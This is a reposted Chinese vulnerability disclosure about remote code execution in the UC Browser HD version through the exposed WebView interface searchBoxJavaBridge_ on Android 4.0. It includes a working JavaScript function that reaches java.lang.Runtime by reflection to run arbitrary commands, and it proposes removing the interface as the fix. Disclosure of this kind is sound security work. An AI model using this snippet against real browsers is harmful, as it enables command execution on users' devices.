好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

UC浏览器HD版本远程代码执行漏洞 - 网站安全 - 自

浏览器来说这种问题还是需要修补的

 

导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在

 

function execute(cmdArgs) { return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); }

 

 

 

 

测试页面:http://drops.wooyun.org/webview.html

 

参见: http://www.2cto.com/Article/201309/241271.html  

漏洞 证明:

1.jpg

修复方案:

需要把这个接口删除,调用remove Java scriptInterface方法 http://www.2cto.com/Article/201404/296370. html

查看更多关于UC浏览器HD版本远程代码执行漏洞 - 网站安全 - 自的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15593
  阅读:113次

上一篇: destoon新版短消息中心xss指谁打谁 - 网站安全 - 自

下一篇:天宇手机官网伪静态SQL注入漏洞 - 网站安全 - 自

相关资讯